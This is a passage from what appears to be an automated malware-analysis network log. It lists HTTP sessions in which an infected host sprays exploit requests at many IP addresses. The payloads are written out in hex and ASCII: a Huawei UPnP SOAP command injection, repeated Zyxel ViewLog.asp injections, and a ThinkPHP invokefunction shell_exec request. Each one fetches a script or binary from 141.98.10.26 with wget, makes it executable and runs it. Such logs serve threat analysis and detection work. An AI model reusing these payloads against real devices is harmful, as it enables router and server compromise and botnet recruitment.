20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.26 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Nov 22, 2023 08:39:47.801142931 CET	14316	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:39:47 GMT Connection: close Content-Length: 334 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 48 6f 73 74 6e 61 6d 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 68 6f 73 74 6e 61 6d 65 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid Hostname</h2><hr><p>HTTP Error 400. The request hostname is invalid.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
704	192.168.2.23	37462	31.136.13.181	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:47.522844076 CET	14309	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:48.099313974 CET	14326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:49.219228983 CET	14431	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:51.554930925 CET	14771	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:56.162216902 CET	15277	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:05.120950937 CET	16387	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:23.294395924 CET	18562	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:41:00.153498888 CET	19778	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
705	192.168.2.23	42048	94.241.165.180	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:47.566557884 CET	14310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:47.666975021 CET	14312	IN	HTTP/1.1 400 Bad Request Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
706	192.168.2.23	53148	95.86.111.191	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:47.702004910 CET	14313	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
707	192.168.2.23	58098	85.69.35.131	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:47.703083992 CET	14313	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:48.259310961 CET	14331	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:49.379152060 CET	14465	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:51.810808897 CET	14781	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:56.418188095 CET	15304	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:05.376908064 CET	16485	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:23.294370890 CET	18561	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:41:00.153496027 CET	19778	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
708	192.168.2.23	50024	31.136.168.238	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:47.706564903 CET	14314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:48.259310007 CET	14330	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:49.379149914 CET	14464	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:51.810797930 CET	14780	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:56.418198109 CET	15305	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:05.376898050 CET	16484	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:23.294384956 CET	18561	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:41:00.153549910 CET	19779	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
709	192.168.2.23	44668	112.175.62.205	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:47.807549000 CET	14317	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:48.096823931 CET	14324	IN	HTTP/1.1 400 Invalid HTTP Request Content-Type: text/html Cache-Control: no-cache Pragma: no-cache Connection: close Content-Length: 2847 Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 33 2e 32 20 46 69 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 73 74 79 6c 65 3e 0a 61 3a 6c 69 6e 6b 09 09 09 7b 66 6f 6e 74 3a 38 70 74 2f 31 31 70 74 20 76 65 72 64 61 6e 61 3b 20 63 6f 6c 6f 72 3a 72 65 64 7d 0a 61 3a 76 69 73 69 74 65 64 09 09 7b 66 6f 6e 74 3a 38 70 74 2f 31 31 70 74 20 76 65 72 64 61 6e 61 3b 20 63 6f 6c 6f 72 3a 23 34 65 34 65 34 65 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 74 69 74 6c 65 3e 43 61 6e 6e 6f 74 20 66 69 6e 64 20 73 65 72 76 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 53 43 52 49 50 54 3e 0a 09 66 75 6e 63 74 69 6f 6e 20 64 6f 4e 65 74 44 65 74 65 63 74 28 29 20 7b 0a 09 09 73 61 4f 43 2e 4e 45 54 44 65 74 65 63 74 4e 65 78 74 4e 61 76 69 67 61 74 65 28 29 3b 0a 09 09 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 0a 09 09 7d 0a 3c 2f 53 43 52 49 50 54 3e 0a 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 34 30 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 33 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 35 22 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 20 69 64 3d 22 74 61 62 6c 65 50 72 6f 70 73 22 20 76 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 20 61 6c 69 67 6e 3d 22 6c 65 66 74 22 20 62 67 63 6f 6c 6f 72 3d 72 65 64 3e 0a 20 20 20 20 26 6e 62 73 70 3b 20 26 6e 62 73 70 3b 20 26 6e 62 73 70 3b 20 26 6e 62 73 70 3b 0a 20 20 20 20 3c 2f 74 64 3e 0a 20 20 20 20 3c 74 64 20 69 64 3d 22 74 61 62 6c 65 50 72 6f 70 73 32 22 20 61 6c 69 67 6e 3d 22 6c 65 66 74 22 20 76 61 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 20 77 69 64 74 68 3d 22 33 36 30 22 3e 3c 66 6f 6e 74 20 69 64 3d 22 74 65 78 74 53 65 63 74 69 6f 6e 31 22 0a 20 20 20 20 73 74 79 6c 65 3d 22 43 4f 4c 4f 52 3a 20 62 6c 61 63 6b 3b 20 46 4f 4e 54 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 22 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 64 69 73 70 6c 61 79 65 64 3c 2f 66 6f 6e 74 3e 0a 20 20 20 20 3c 2f 74 64 3e 0a 20 20 3c 2f 74 72 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 20 69 64 3d 22 74 61 62 6c 65 50 72 6f 70 73 57 69 64 74 68 22 20 77 69 64 74 68 3d 22 34 30 30 22 20 63 6f 6c 73 70 61 6e 3d 22 32 22 3e 3c 66 6f 6e 74 0a 20 20 20 20 73 74 79 6c 65 3d 22 43 4f 4c 4f 52 3a 20 62 6c 61 63 6b 3b 20 46 4f 4e 54 3a 20 38 70 74 2f 31 31 70 74 20 76 65 72 64 61 6e 61 22 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 0a 20 20 20 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 54 68 65 20 57 65 62 20 73 69 74 65 20 6d 69 67 68 74 20 62 65 20 65 78 70 65 72 69 65 6e 63 69 6e 67 20 74 65 63 68 6e 69 63 61 6c 20 64 69 66 66 69 63 75 6c 74 69 65 73 2c 20 6f 72 20 79 6f 75 20 6d 61 79 20 6e 